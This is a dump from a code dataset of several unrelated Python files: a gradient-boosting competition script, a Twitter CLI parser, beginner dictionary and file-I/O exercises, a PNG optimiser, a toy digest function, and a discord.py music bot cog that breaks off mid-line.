train_feat.append(train_feat_temp[train_feat_temp['prov']==11])\nprint('开始CV 5折训练...')\nscores = []\nt0 = time.time()\nmean_score = []\ntrain_preds = np.zeros(len(train_feat))\ntest_preds11 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n lgb_train = lgb.Dataset(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n lgb_test = lgb.Dataset(train_feat[predictors].iloc[test_index], train_feat['label'].iloc[test_index])\n\n params = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc',\n 'num_leaves': 150,\n 'learning_rate': 0.01,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'feature_fraction': 0.8,\n 'bagging_fraction': 0.95,\n 'bagging_freq': 5,\n 'verbose': -1,\n 'seed': 100,\n }\n gbm = lgb.train(params, lgb_train, 900)\n train_preds_sub = gbm.predict(train_feat[predictors].iloc[test_index])\n train_preds[test_index] += train_preds_sub\n test_preds_sub = gbm.predict(test_feat[predictors])\n test_preds11 += test_preds_sub\n\n score = roc_auc_score(train_feat['label'].iloc[test_index],train_preds_sub)\n scores.append(score)\n print('第{0}轮mae的得分: {1}'.format(i + 1, score))\ntest_preds11 = test_preds11/5\nprint('auc平均得分: {}'.format(np.mean(scores)))\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\nprint('开始CV 5折训练...')\ntrain_feat = train_feat_temp.append(train_feat_temp[(train_feat_temp['prov']==12)])\ntrain_feat = train_feat.append(train_feat_temp[(train_feat_temp['prov']==12)])\nscores = []\nt0 = time.time()\nmean_score = []\ntrain_preds = np.zeros(len(train_feat))\ntest_preds12 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n lgb_train = lgb.Dataset(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n lgb_test = lgb.Dataset(train_feat[predictors].iloc[test_index], train_feat['label'].iloc[test_index])\n\n params = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc',\n 'num_leaves': 150,\n 'learning_rate': 0.01,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'feature_fraction': 0.8,\n 'bagging_fraction': 0.95,\n 'bagging_freq': 5,\n 'verbose': -1,\n 'seed': 100,\n }\n gbm = lgb.train(params, lgb_train, 900)\n train_preds_sub = gbm.predict(train_feat[predictors].iloc[test_index])\n train_preds[test_index] += train_preds_sub\n test_preds_sub = gbm.predict(test_feat[predictors])\n test_preds12 += test_preds_sub\n\n score = roc_auc_score(train_feat['label'].iloc[test_index],train_preds_sub)\n scores.append(score)\n print('第{0}轮mae的得分: {1}'.format(i + 1, score))\ntest_preds12 = test_preds12/5\nprint('auc平均得分: {}'.format(np.mean(scores)))\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\ntest_feat['pred11'] = test_preds11\ntest_feat['pred12'] = test_preds12\ntest_feat['pred'] = test_feat.apply(lambda x: x.pred11 if x.prov==11 else x.pred12, axis=1)\npreds_scatter = get_threshold(test_feat['pred'].values)\nsubmission = pd.DataFrame({'EID':sumbmission['id'],'FORTARGET':preds_scatter,'PROB':1-test_feat['pred'].values})\nsubmission.to_csv(r'C:\\Users\\csw\\Desktop\\python\\liangzi\\submission\\sub{}.csv'.format(datetime.datetime.now().strftime('%Y%m%d_%H%M%S')), index=False, float_format='%.4f')\n\n\n\n\n\n\n\n\n\n\n################################## xgb重采样 ################################\nimport xgboost\n\nprint('读取train数据...')\ndata_path = 'C:/Users/csw/Desktop/python/liangzi/data/'\ncache_path = 'F:/liangzi_cache/'\n\ntrain = pd.read_csv(data_path + 'train.csv')\ntest = pd.read_csv(data_path + 'evaluation_public.csv')\ntest['label'] = np.nan\n\nprint('构造特征...')\ntrain_feat_temp = make_set(train,train,data_path)\ntest_feat = make_set(train,test,data_path)\nsumbmission = test_feat[['id']].copy()\n\ntrain_feat = train_feat_temp.append(train_feat_temp[train_feat_temp['prov']==11])\ntrain_feat = train_feat.append(train_feat_temp[train_feat_temp['prov']==11])\npredictors = train_feat.columns.drop(['id','label','enddate','hy_16.0', 'hy_91.0', 'hy_94.0'])\n\nprint('开始CV 5折训练...')\nscores = []\nt0 = time.time()\ntest_preds11 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n xgb_train = xgboost.DMatrix(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n xgb_eval = xgboost.DMatrix(test_feat[predictors])\n\n xgb_params = {\n \"objective\": \"reg:logistic\"\n , \"eval_metric\": \"auc\"\n , \"eta\": 0.01\n , \"max_depth\": 12\n , \"min_child_weight\": 10\n , \"gamma\": 0.70\n , \"subsample\": 0.76\n , \"colsample_bytree\": 0.95\n , \"alpha\": 2e-05\n , \"lambda\": 10\n }\n bst = xgboost.train(params=xgb_params,dtrain=xgb_train,num_boost_round=1200)\n test_preds_sub = bst.predict(xgb_eval)\n test_preds11 += test_preds_sub\n\ntest_preds11 = test_preds11/5\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\nprint('开始CV 5折训练...')\ntrain_feat = train_feat_temp.append(train_feat_temp[(train_feat_temp['prov']==12)])\ntrain_feat = train_feat.append(train_feat_temp[(train_feat_temp['prov']==12)])\nt0 = time.time()\ntest_preds12 = np.zeros(len(test_feat))\nkf = KFold(len(train_feat), n_folds = 5, shuffle=True, random_state=520)\nfor i, (train_index, test_index) in enumerate(kf):\n xgb_train = xgboost.DMatrix(train_feat[predictors].iloc[train_index], train_feat['label'].iloc[train_index])\n xgb_eval = xgboost.DMatrix(test_feat[predictors])\n\n xgb_params = {\n \"objective\": \"reg:logistic\"\n , \"eval_metric\": \"auc\"\n , \"eta\": 0.01\n , \"max_depth\": 12\n , \"min_child_weight\": 10\n , \"gamma\": 0.70\n , \"subsample\": 0.76\n , \"colsample_bytree\": 0.95\n , \"alpha\": 2e-05\n , \"lambda\": 10\n }\n bst = xgboost.train(params=xgb_params, dtrain=xgb_train, num_boost_round=1200)\n test_preds_sub = bst.predict(xgb_eval)\n test_preds12 += test_preds_sub\n\ntest_preds12 = test_preds12/5\nprint('CV训练用时{}秒'.format(time.time() - t0))\n\ntest_feat['pred11'] = test_preds11\ntest_feat['pred12'] = test_preds12\ntest_feat['pred'] = test_feat.apply(lambda x: x.pred11 if x.prov==11 else x.pred12, axis=1)\npreds_scatter = get_threshold(test_feat['pred'].values)\nsubmission = pd.DataFrame({'EID':sumbmission['id'],'FORTARGET':preds_scatter,'PROB':test_feat['pred'].values})\nsubmission.to_csv(r'C:\\Users\\csw\\Desktop\\python\\liangzi\\submission\\sub{}.csv'.format(datetime.datetime.now().strftime('%Y%m%d_%H%M%S')), index=False)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"liangzi/piupiu_fengxian.py","file_name":"piupiu_fengxian.py","file_ext":"py","file_size_in_byte":29148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154904474","text":"# -*- coding: utf-8 -*-\n# Copyright © 2015-2017 Carl Chenet \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n\n# CLI parsing\n'''CLI parsing'''\n\n# standard libraries imports\nfrom argparse import ArgumentParser\nimport os.path\nimport sys\n\nclass CliParse:\n '''CliParse class'''\n def __init__(self):\n '''Constructor for the CliParse class'''\n self.epilog = 'For more information: https://db2twitter.readthedocs.io'\n self.description = 'db2twitter automatically extracts fields from your database, use them to feed a template of tweet and send the tweet'\n self.main()\n\n def main(self):\n '''main of CliParse class'''\n parser = ArgumentParser(prog='db2twitter',\n description=self.description,\n epilog=self.epilog)\n parser.add_argument('pathtoconf', metavar='FILE', type=str,\n help='the path to the retweet configuration')\n parser.add_argument('-c', '--circle', action='store_true',\n default=False, help='circling the last tweets')\n parser.add_argument('--dry-run', dest='dryrun', action='store_true',\n default=False, help='simulate the execution, no tweet sent')\n self.cliargs = parser.parse_args()\n if not os.path.exists(self.cliargs.pathtoconf):\n sys.exit('the path you provided for db2twitter configuration file does not exist')\n if not os.path.isfile(self.cliargs.pathtoconf):\n sys.exit('the path you provided for db2twitter configuration is not a file')\n\n @property\n def args(self):\n '''return the cli arguments'''\n return self.cliargs\n","sub_path":"db2twitter/cliparse.py","file_name":"cliparse.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503910991","text":"# Dictionaries\n# 1. Exercise 1\nphonebook_dict = {\n 'Alice': '703-493-1834',\n 'Bob': '857-384-1234',\n 'Elizabeth': '484-584-2923'\n}\nprint(\"Elizabeth's phone number is:\",phonebook_dict['Elizabeth'])\nphonebook_dict['Kareem'] = '938-489-1234'\nprint(\"Kareem's phone number is:\", phonebook_dict['Kareem'])\ndel phonebook_dict['Alice']\nphonebook_dict['Bob']='968-345-2345'\nprint(\"The phonebook dictionary consists of the following keys:\", phonebook_dict.keys())\nprint(\"The phonebook dictionary consists of the following values/numbers:\", phonebook_dict.values())\nprint(\"The phonebook dictionary consists of the following items:\", phonebook_dict.items())\n\n\n# Exercise 2: Nested Dictionaries\nramit = {\n 'name': 'Ramit',\n 'email': 'ramit@gmail.com',\n 'interests': ['movies', 'tennis'],\n 'friends': [\n {\n 'name': 'Jasmine',\n 'email': 'jasmine@yahoo.com',\n 'interests': ['photography', 'tennis']\n },\n {\n 'name': 'Jan',\n 'email': 'jan@hotmail.com',\n 'interests': ['movies', 'tv']\n }\n ]\n}\nprint(\"Ramit's email is:\",ramit['email'])\nprint(\"Ramit's first interest is:\", ramit['interests'][0])\nprint(\"Jasmine's email is:\",ramit['friends'][0]['email'])\nprint(\"The second of Jan's two interests is:\",ramit['friends'][1]['interests'][1])\n\n# Exercise 3: Letter Summary \n#s = \"banana\"\n\ndef letter_histogram(str1):\n dict = {}\n for n in str1: # treating the string as an array vs the second exercise where we are creating the array first\n keys = dict.keys()\n if n in keys:\n dict[n] += 1\n else:\n dict[n] = 1\n return dict\nprint(letter_histogram('banana'))\n\n## Need to review \n# Exercise 4: Word Summary \ndef word_histogram(text):\n text = text.lower()\n word_dict = {}\n word_list = text.replace('\\n', ' ').replace('.',' ').split(' ')\n for word in word_list:\n if word in word_dict:\n word_dict[word] += 1\n else: \n word_dict[word]=1\n return(word_dict)\n\nif __name__ ==\"__main__\": # this is to not allow running the function when the file is imported\n text = input(\"Please give me a sentence\")\n print(word_histogram(text))\n \n\n \n \n \n \n \n ","sub_path":"PythonPart3_Dic_IO.py","file_name":"PythonPart3_Dic_IO.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499241027","text":"#!/usr/bin/env python\n# encoding: utf-8\n#\n# Copyright © 2014 deanishe@deanishe.net\n#\n# MIT Licence. See http://opensource.org/licenses/MIT\n#\n# Created on 2014-11-10\n#\n\n\"\"\"\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals, absolute_import\n\nimport os\nimport subprocess\nimport sys\n\n\ndef pngcrush(filepath):\n \"\"\"Run file through `pngcrush` and return SHA1 hash\"\"\"\n name, ext = os.path.splitext(filepath)\n temppath = '{}.{}{}'.format(name, os.getpid(), ext)\n size_in = os.stat(filepath).st_size\n os.rename(filepath, temppath)\n cmd = [\n 'pngcrush',\n '-rem', 'allb',\n '-m', '10',\n '-q',\n '-reduce',\n temppath,\n filepath,\n ]\n subprocess.call(cmd)\n if os.path.exists(filepath) and os.path.exists(temppath):\n os.unlink(temppath)\n size_out = os.stat(filepath).st_size\n pc = (float(size_out) / size_in) * 100\n print('Optimised [{:4d}b / {:0.1f}%] `{}`'.format(\n size_out, pc, filepath), file=sys.stderr)\n\n\ndef main():\n if not len(sys.argv) == 2:\n print('Usage: optimise-pngs.py ')\n return 1\n\n rootdir = sys.argv[1]\n\n for root, dirnames, filenames in os.walk(rootdir):\n for filename in filenames:\n if not filename.lower().endswith('.png'):\n continue\n filepath = os.path.join(root, filename)\n pngcrush(filepath)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"extra/optimise-pngs.py","file_name":"optimise-pngs.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333840144","text":"\"\"\"\nGeorgia Institute of Technology - CS1301\nHW08 - File I/O\n\"\"\"\n__author__ = \"\"\" Jade Law \"\"\"\n__collab__ = \"\"\" I worked on some of the problems with Rashmi Athavale. \"\"\"\n\n\"\"\"\nFunction name: get_roster\nParameters: filename (string)\nReturns: Read in a file of any name, but assume it is in the format stated\nabove. Go through every line and make a list of tuples of all the students\nin the class. The tuples will be formatted (FirstName, LastName). Return this\nlist. If the file is not found, catch a FileNotFoundError and return\n“File is not found.” \n\"\"\"\ndef get_roster(filename):\n tuplist = []\n num = 0\n try:\n file = open(filename,\"r\")\n lines = file.readlines()\n for line in lines:\n if \",\" in line:\n line = line.strip()\n num = line.find(\",\")\n tuplist.append((line[:num], line[num+2:]))\n else:\n continue\n file.close()\n return tuplist\n except FileNotFoundError:\n return \"File is not found.\"\n\n\"\"\"\nFunction name: get_average\nParameters: filename (string), student (string)\nReturns: A tuple with the name of the student (without the comma)\nand their average for their exams\nDescription: Read in a file of any name but in the format as what is stated\nabove. For the student passed into the function, find the student and take\nthe average of their test scores. The average will be a float rounded to two\ndecimals. Return this data as a tuple in the format\n(FirstName LastName, Average). If the student is not found in the file,\nreturn “Student not found in file.”. If the file is not found, catch a\nFileNotFoundError and return “File is not found.” \n\"\"\"\ndef get_average(filename, student):\n studentname = student.split()\n studentname = studentname[0] + \", \" + studentname [1] + \"\\n\"\n avgscore = 0\n try:\n file = open(filename,\"r\")\n lines = file.readlines()\n lines.append(\"\\n\")\n num = lines.index(studentname)\n lines = lines[num+1:]\n num = lines.index(\"\\n\")\n lines = lines[:num]\n for score in lines:\n num = score.find(\":\")\n score = float(score[num+2:])\n avgscore += score\n avgscore = round(avgscore/len(lines),2)\n file.close()\n return (student, avgscore)\n except FileNotFoundError:\n return \"File is not found.\"\n except ValueError:\n file.close()\n return \"Student not found in file.\"\n\n\"\"\"\nFunction name: get_all_averages\nParameters: filename (string)\nReturns: A dictionary representing a student as the key,\nand their average on exams as the value\nDescription: Read in a file of any name but in the format as what is stated\nabove. For every student, make an entry in a dictionary where their first\nname is the key and their average for their exams as the value. The file will\nnot have duplicate first names. The average will be a float rounded to two\ndecimals. If the file is not found, catch a FileNotFoundError and return\n“File is not found.” \n\"\"\"\n\ndef get_all_averages(filename):\n newdict = {}\n name = \"\"\n score = 0\n testcount = 0\n try:\n file = open(filename,\"r\")\n lines = file.readlines()\n for line in lines:\n if \",\" in line:\n name = line[:line.find(\",\")]\n elif \":\" in line:\n line = line.strip()\n score += float(line[line.find(\":\")+2:])\n testcount += 1\n else:\n newdict[name] = round(score/testcount,2)\n name = \"\"\n score = 0\n testcount = 0\n newdict[name] = round(score/testcount,2)\n file.close()\n return newdict\n except FileNotFoundError:\n return \"File is not found.\"\n\n\"\"\"\nFunction name: form_groups\nParameters: filename (string), current_student (string), num_per_team (int)\nReturns: None\nDescription: Read in a file of any name but in the format as what is stated\nabove. If the file is not found, catch a FileNotFoundError and return\n“File is not found.”. In a new file to write named group.txt, write\n“Team StudentName” on one line, replacing StudentName with the name of the\ncurrent student passed in. Go through the file to find the top X-1 number\nof students to add to your team, top being those with the highest averages.\nX is the number passed in representing the maximum number of people per team,\nand X-1 is the number of students selected on the team minus the current\nstudent. The current student can not be one of the students added to the team.\nIf there are less than X number of students, then everyone in the file is\nincluded on the team. However, the number of students in a team can not exceed\nX. If X == 1, then just write the header on the file “Team StudentName”\nand if X == 0, then do not write anything to the file. There will not be more\nthan one student with the same average. Each of these students will be a\nseparate line in the new file in the format of “Y) Student Name”, Y being a\nnumber in a list in increasing order, going from 1 - the maximum number of\npeople per team. The top student will be 1, and then it will go down in\ndecreasing top scores. The last line of the file should not have a “\\n”.\nThis function will return None unless there is an error.\n\"\"\"\ndef form_groups(filename, current_student, num_per_team):\n studentname = current_student.split()\n studentname = studentname[0] + \", \" + studentname [1] + \"\\n\"\n score = 0\n testcount = 0\n studict = {}\n try:\n stufile = open(filename,\"r\")\n lines = stufile.readlines()\n lines.append(\"\\n\")\n for line in lines:\n if \",\" in line:\n name = line\n if name != studentname:\n if \",\" in line:\n student = line.strip()\n student = student[:line.find(\",\")]\n student += line[line.find(\",\")+1:line.find(\"\\n\")]\n elif \":\" in line:\n line = line.strip()\n score += float(line[line.find(\":\")+2:])\n testcount += 1\n else:\n studict[student] = round(score/testcount,2)\n student = \"\"\n score = 0\n testcount = 0\n stufile.close()\n groupfile = open(\"group.txt\",\"w\")\n groupfile.write(\"Team \" + current_student + \"\\n\")\n if num_per_team-1 < len(studict.keys()):\n for i in range(num_per_team-1):\n highest = -1\n for name,avg in studict.items():\n if avg > highest:\n highest = avg\n highestName = name\n groupfile.write(\"{}) {}\\n\".format(i+1, highestName))\n del studict[highestName]\n elif num_per_team-1 > len(studict.keys()):\n for i in range(len(studict.keys())):\n highest = -1\n for name,avg in studict.items():\n if avg > highest:\n highest = avg\n highestName = name\n groupfile.write(\"{}) {}\\n\".format(i+1, highestName))\n del studict[highestName]\n groupfile.close()\n except FileNotFoundError:\n return \"File is not found.\"\n \nform_groups('files/CS1332.txt', 'Steve Jobs', 0)\n\"\"\"\nFunction name: zero_calorie_diet\nParameters: filename (string)\nReturns: A string representing the name of a dish\nDescription: Read in a file of any name but in the format as what is stated\nabove. If the file is not found, catch a FileNotFoundError and return\n“File is not found.”. You are trying to go on a low calorie diet, so parse\nthrough the file and return the name of the dish with the least amount of\ncalories. If two dishes have the same amount of calories, return the one that\noccurred first. \n\"\"\"\ndef zero_calorie_diet(filename):\n try:\n file = open(filename,\"r\")\n heading = file.readline()\n lines = file.readlines()\n lowcal = 10000000000000\n for line in lines:\n line = line.split(\",\")\n line[2] = int(line[2])\n line = tuple(line)\n (name, price, cal, cuisine) = (line[0], line[1], line[2], line[3])\n if cal < lowcal:\n lowcal = cal\n lowfood = name\n file.close()\n return lowfood\n except FileNotFoundError:\n return \"File is not found.\"\n\n\"\"\"\nFunction name: erica_menu\nParameters: filename (string), num_of_dishes (int)\nReturns: None\nDescription: Read in a file of any name but in the format as what is stated\nabove. If the file is not found, catch a FileNotFoundError and return\n“File is not found.”. Erica wants to put together an ideal menu for her,\nconsisting of the same or less number of items than the number passed in,\nbut never more. There are conditions, however, since she is broke and very\npicky. Parse through the file and create a menu for Erica by choosing the\ncheapest dishes. However, never put a Vegetarian dish on her menu, because\nshe will not eat it. What this means is that if there are 4 dishes on the\nlist, one being Vegetarian, and she wants 4 items on her menu, then her menu\nwill consist of 3 dishes. You will be writing this menu out onto a new file\nnamed EricaMenu.txt. The first line of the file will be “Erica’s Menu” and\nevery corresponding line after that will be the Dish Name, Price, and Cuisine\nType all on the same line, with each dish being on a separate line.\nPrice will have a $ preceding the number and each element for a line, except\nthe last element, will be followed by a “, “ (comma and space). The last\nline will not have a “\\n”. This function will return None, unless there is an\nerror. \n\"\"\"\ndef erica_menu(filename, num_of_dishes):\n try:\n file = open(filename,\"r\")\n heading = file.readline()\n lines = file.readlines()\n menu = open(\"EricaMenu.txt.\",\"w\")\n menu.write(\"Erica's Menu\\n\")\n used = []\n foods = {}\n num = 0\n for line in lines:\n line = line.split(\",\")\n line[1] = float(line[1][1:])\n line[3] = line[3].strip()\n line = tuple(line)\n (name, price, cal, cuisine) = (line[0], line[1], line[2], line[3])\n if cuisine != \"Vegetarian\":\n foods[name] = (price, cuisine)\n for i in range(num_of_dishes):\n if len(foods) != 1:\n cheapest = 100000000\n for food in foods:\n (price, cuisine) = (foods[food][0], foods[food][1])\n if price < cheapest:\n cheapest = price\n cheapfood = food\n cheapcuisine = cuisine\n menu.write(\"{}, ${}, {}\\n\".format(cheapfood, str(cheapest), cheapcuisine))\n del foods[cheapfood]\n else:\n for food in foods:\n menu.write(\"{}, ${}, {}\".format(food, foods[food][0], foods[food][1]))\n break\n file.close()\n menu.close()\n except FileNotFoundError:\n return \"File is not found.\"\n\nerica_menu('files/chikfila.csv', 0)\nerica_menu('files/westvillage.csv', 10)\nerica_menu('files/chikfila.csv', 4)\nerica_menu('files/chikfila.csv', 10)\n","sub_path":"HW08_FileIO.py","file_name":"HW08_FileIO.py","file_ext":"py","file_size_in_byte":11371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"646238326","text":"\"\"\"\r\nSimple interest formula is given by:\r\nSimple Interest = (P x T x R)/100\r\nWhere,\r\nP is the principle amount\r\nT is the time and\r\nR is the rate\r\n\r\n\"\"\"\r\ndef si(p,r,t):\r\n si = (P * R * T) / 100\r\n return si\r\n\r\nP = 1000\r\nR = 5\r\nT = 5\r\n\r\nprint(si(P,R,T))\r\n","sub_path":"Python Program for simple interest.py","file_name":"Python Program for simple interest.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584670586","text":"import random\n\n\ndef hash(plain):\n cols = 4\n # Kodomain yang digunakan berupa huruf w/x/y/z (119-122)\n char = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\",\n \"8\", \"9\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n startChar = 97\n codomain = [0]*cols\n result = ''\n\n # Random digunakan sebagai padding apabila len(plain)= cols:\n break\n plain += chr(startChar + random.randint(0, 26))\n\n # Membagi string kedalam 4 kolom codomain\n # Lalu setiap char di kolom tersebut di XOR kan nilai ASCII nya\n for i in range(len(plain)):\n modulo = i % cols\n codomain[modulo] ^= ord(plain[i])\n\n # Setiap kolom dijadikan char dengan nilai w/x/y/z sesuai hasil xor % 4\n # Ditambah startChar\n for i in range(cols):\n result += chr(startChar + (codomain[i] % cols))\n\n return result\n\n\n# Meminta input dan menampilkan hasil\nplain = input(\"Plain text: \")\n\ndigest = hash(plain)\nprint(\"Digest: \", end='')\nprint(digest)\n","sub_path":"minggu4/digestV2.py","file_name":"digestV2.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274700763","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (c) 2019 Valentin B.\nRequirements:\nPython 3.5+\npip install -U discord.py pynacl youtube-dl\nYou also need FFmpeg in your PATH environment variable or the FFmpeg.exe binary in your client's directory on Windows.\n\"\"\"\n\n\"\"\"\nMerci A Valentin B pour son code source qui m'as permis d'apprendre beaucoup\n\"\"\"\n\nimport asyncio\nimport functools\nimport itertools\nimport math\nimport random\n\nimport discord\nimport youtube_dl\nfrom async_timeout import timeout\nfrom discord.ext import commands\n\n# Silence useless bug reports messages\nyoutube_dl.utils.bug_reports_message = lambda: ''\n\n\nclass VoiceError(Exception):\n pass\n\n\nclass YTDLError(Exception):\n pass\n\n\nclass YTDLSource(discord.PCMVolumeTransformer):\n YTDL_OPTIONS = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': 'mp3',\n 'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',\n 'restrictfilenames': True,\n 'noplaylist': False,\n 'nocheckcertificate': True,\n 'ignoreerrors': False,\n 'logtostderr': False,\n 'quiet': True,\n 'no_warnings': True,\n 'default_search': 'auto',\n 'source_address': '0.0.0.0',\n }\n\n FFMPEG_OPTIONS = {\n 'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',\n 'options': '-vn',\n }\n\n ytdl = youtube_dl.YoutubeDL(YTDL_OPTIONS)\n\n def __init__(self, ctx: commands.Context, source: discord.FFmpegPCMAudio, *, data: dict, volume: float = 0.5):\n super().__init__(source, volume)\n\n self.requester = ctx.author\n self.channel = ctx.channel\n self.data = data\n\n self.uploader = data.get('uploader')\n self.uploader_url = data.get('uploader_url')\n date = data.get('upload_date')\n self.upload_date = date[6:8] + '.' + date[4:6] + '.' + date[0:4]\n self.title = data.get('title')\n self.thumbnail = data.get('thumbnail')\n self.description = data.get('description')\n self.duration = self.parse_duration(int(data.get('duration')))\n self.tags = data.get('tags')\n self.url = data.get('webpage_url')\n self.views = data.get('view_count')\n self.likes = data.get('like_count')\n self.dislikes = data.get('dislike_count')\n self.stream_url = data.get('url')\n\n def __str__(self):\n return '**{0.title}** de **{0.uploader}**'.format(self)\n\n @classmethod\n async def create_source(cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None):\n loop = loop or asyncio.get_event_loop()\n\n partial = functools.partial(cls.ytdl.extract_info, search, download=False, process=False)\n data = await loop.run_in_executor(None, partial)\n\n if data is None:\n raise YTDLError(\"Je n'ai pas pu trouver de résultat `{}`\".format(search))\n\n if 'entries' not in data:\n process_info = data\n else:\n process_info = None\n for entry in data['entries']:\n if entry:\n process_info = entry\n break\n\n if process_info is None:\n raise YTDLError(\"Je n'ai pas pu trouver de résultat `{}`\".format(search))\n\n webpage_url = process_info['webpage_url']\n partial = functools.partial(cls.ytdl.extract_info, webpage_url, download=False)\n processed_info = await loop.run_in_executor(None, partial)\n\n if processed_info is None:\n raise YTDLError('Erreur - impossible de récuperer'.format(webpage_url))\n\n if 'entries' not in processed_info:\n info = processed_info\n else:\n info = None\n while info is None:\n try:\n info = processed_info['entries'].pop(0)\n except IndexError:\n raise YTDLError(\"Je n'ai pas pu trouver de résultat `{}`\".format(webpage_url))\n\n return cls(ctx, discord.FFmpegPCMAudio(info['url'], **cls.FFMPEG_OPTIONS), data=info)\n\n @staticmethod\n def parse_duration(duration: int):\n minutes, seconds = divmod(duration, 60)\n hours, minutes = divmod(minutes, 60)\n days, hours = divmod(hours, 24)\n\n duration = []\n if days > 0:\n duration.append('{} jours'.format(days))\n if hours > 0:\n duration.append('{} heures'.format(hours))\n if minutes > 0:\n duration.append('{} minutes'.format(minutes))\n if seconds > 0:\n duration.append('{} secondes'.format(seconds))\n\n return ', '.join(duration)\n\n\nclass Song:\n __slots__ = ('source', 'requester')\n\n def __init__(self, source: YTDLSource):\n self.source = source\n self.requester = source.requester\n\n def create_embed(self):\n embed = (discord.Embed(title='Joue actuellement',\n description='```css\\n{0.source.title}\\n```'.format(self),\n color=discord.Color.blurple())\n .add_field(name='Durée', value=self.source.duration)\n .add_field(name='Requête de', value=self.requester.mention)\n .add_field(name='Auteur', value='[{0.source.uploader}]({0.source.uploader_url})'.format(self))\n .add_field(name='URL', value='[Click]({0.source.url})'.format(self))\n .set_thumbnail(url=self.source.thumbnail))\n\n return embed\n\n\nclass SongQueue(asyncio.Queue):\n def __getitem__(self, item):\n if isinstance(item, slice):\n return list(itertools.islice(self._queue, item.start, item.stop, item.step))\n else:\n return self._queue[item]\n\n def __iter__(self):\n return self._queue.__iter__()\n\n def __len__(self):\n return self.qsize()\n\n def clear(self):\n self._queue.clear()\n\n def shuffle(self):\n random.shuffle(self._queue)\n\n def remove(self, index: int):\n del self._queue[index]\n\n\nclass VoiceState:\n def __init__(self, client, ctx: commands.Context):\n self.client = client\n self._ctx = ctx\n\n self.current = None\n self.voice = None\n self.next = asyncio.Event()\n self.songs = SongQueue()\n\n self._loop = False\n self._volume = 0.5\n self.skip_votes = set()\n\n self.audio_player = client.loop.create_task(self.audio_player_task())\n\n def __del__(self):\n self.audio_player.cancel()\n\n @property\n def loop(self):\n return self._loop\n\n @loop.setter\n def loop(self, value: bool):\n self._loop = value\n\n @property\n def volume(self):\n return self._volume\n\n @volume.setter\n def volume(self, value: float):\n self._volume = value\n\n @property\n def is_playing(self):\n return self.voice and self.current\n\n async def audio_player_task(self):\n while True:\n self.next.clear()\n\n if not self.loop:\n # Try to get the next song within 60 minutes.\n # If no song will be added to the queue in time,\n # the player will disconnect due to performance\n # reasons.\n try:\n async with timeout(3600): # 60 minutes\n self.current = await self.songs.get()\n except asyncio.TimeoutError:\n self.client.loop.create_task(self.stop())\n await self._ctx.send(\"Timeout\")\n return\n\n self.current.source.volume = self._volume\n self.voice.play(self.current.source, after=self.play_next_song)\n await self.current.source.channel.send(embed=self.current.create_embed())\n\n await self.next.wait()\n\n def play_next_song(self, error=None):\n if error:\n raise VoiceError(str(error))\n\n self.next.set()\n\n def skip(self):\n self.skip_votes.clear()\n\n if self.is_playing:\n self.voice.stop()\n\n async def stop(self):\n self.songs.clear()\n\n if self.voice:\n await self.voice.disconnect()\n self.voice = None\n\n\nclass Musique(commands.Cog):\n def __init__(self, client):\n self.client = client\n self.voice_states = {}\n print(\"Music is loaded\")\n\n def get_voice_state(self, ctx: commands.Context):\n state = self.voice_states.get(ctx.guild.id)\n if not state:\n state = VoiceState(self.client, ctx)\n self.voice_states[ctx.guild.id] = state\n\n return state\n\n def cog_unload(self):\n for state in self.voice_states.values():\n self.client.loop.create_task(state.stop())\n\n def cog_check(self, ctx: commands.Context):\n if not ctx.guild:\n raise commands.NoPrivateMessage('Cette commande ne peut être utilisée en message privé')\n\n return True\n\n async def cog_before_invoke(self, ctx: commands.Context):\n ctx.voice_state = 